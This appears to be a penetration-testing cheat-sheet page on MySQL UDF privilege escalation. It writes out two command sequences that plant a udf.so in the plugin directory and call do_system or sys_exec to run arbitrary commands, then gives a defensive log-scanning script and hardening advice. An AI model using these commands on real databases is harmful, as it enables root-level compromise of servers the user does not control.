MySQL exploit
MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit
Requirements
MySQL running as root
Insecure handling of files
Plugin directory knowledge
.so file download
Download from github:metasploit-framework
Method 1 (access to box):
mysql -uroot -p<PASS>
> USE mysql;
> CREATE table kashz(line blob);
> INSERT INTO kashz VALUES(load_file('/PATH/udf.so'));
> SELECT * FROM kashz INTO dumpfile '/PLUGIN-DIR/udf.so';
# create function
> CREATE FUNCTION do_system RETURNS integer soname 'udf.so';
> SELECT * from mysql.func;
# run RCE
> SELECT do_system('RCE');
Method 2 (no access to box):
Generate shellcode (hex dump of udf.so):
xxd -p udf.so | tr -d '\n' > udf.so.hex
> SELECT @@plugin_dir;
> SET @shell = 0x<SHELLCODE-DATA>;
> SELECT binary @shell into dumpfile 'PLUGIN-DIR/udf.so';
# create function
> CREATE FUNCTION sys_exec RETURNS int soname 'udf.so';
> SELECT * FROM mysql.func;
# run RCE
> SELECT sys_exec('RCE');
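Detection: both methods leave the same statements in the server's general query log (a `.so` written with INTO DUMPFILE, then CREATE FUNCTION ... SONAME). The script below is an added example, not code from this page or the referenced exploits; it assumes the general query log is enabled with one statement per line, and the function names and sample log lines are constructed for illustration.

```bash
#!/bin/sh
# Added example: flag UDF-abuse statements in a MySQL general query log.
# Assumption: general_log is ON and every statement sits on a single line.

# scan_udf_abuse [FILE...]
# Reads the log from FILE(s) or stdin and prints "<line-no>:<reason>:<log line>".
scan_udf_abuse() {
  awk '
    {
      l = tolower($0)
      # A shared object written to disk from SQL (used by both methods).
      if (l ~ /into[ \t]+dumpfile[ \t]+.*\.so/)
        print NR ":dumpfile-so:" $0
      # A UDF registered from a shared library; stored functions have no SONAME.
      else if (l ~ /create[ \t]+(aggregate[ \t]+)?function[ \t].*soname/)
        print NR ":create-udf:" $0
      # A hex literal that starts with the ELF magic bytes 7f 45 4c 46.
      else if (l ~ /0x7f454c46/)
        print NR ":elf-hex-literal:" $0
      # A server-side file read staged into a table or variable.
      else if (l ~ /load_file[ \t]*\(/)
        print NR ":load-file:" $0
    }
  ' "$@"
}

# Constructed sample log (not captured from a real server).
sample_log() {
  cat <<'EOF'
2024-05-01T10:00:01.000000Z  7 Query  SELECT * FROM orders WHERE id = 4
2024-05-01T10:00:02.000000Z  9 Query  INSERT INTO t VALUES(load_file('/tmp/lib.so'))
2024-05-01T10:00:03.000000Z  9 Query  SELECT * FROM t INTO dumpfile '/usr/lib/mysql/plugin/lib.so'
2024-05-01T10:00:04.000000Z  9 Query  SET @b = 0x7f454c4602010100
2024-05-01T10:00:05.000000Z  9 Query  CREATE FUNCTION f RETURNS integer soname 'lib.so'
2024-05-01T10:00:06.000000Z  7 Query  CREATE FUNCTION add2(a INT) RETURNS INT DETERMINISTIC RETURN a+2
EOF
}

# Demo run: lines 2 to 5 are flagged; lines 1 and 6 are ordinary statements.
sample_log | scan_udf_abuse
```

Restricting `secure_file_priv` to a dedicated directory and running mysqld under an unprivileged account removes the file-handling and root preconditions listed under Requirements.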
References
https://www.exploit-db.com/exploits/1518
https://github.sofianehamlaoui.fr/Security-Cheatsheets/databases/mysql/mysql-root-to-system-root/
https://gist.github.com/p0c/8587757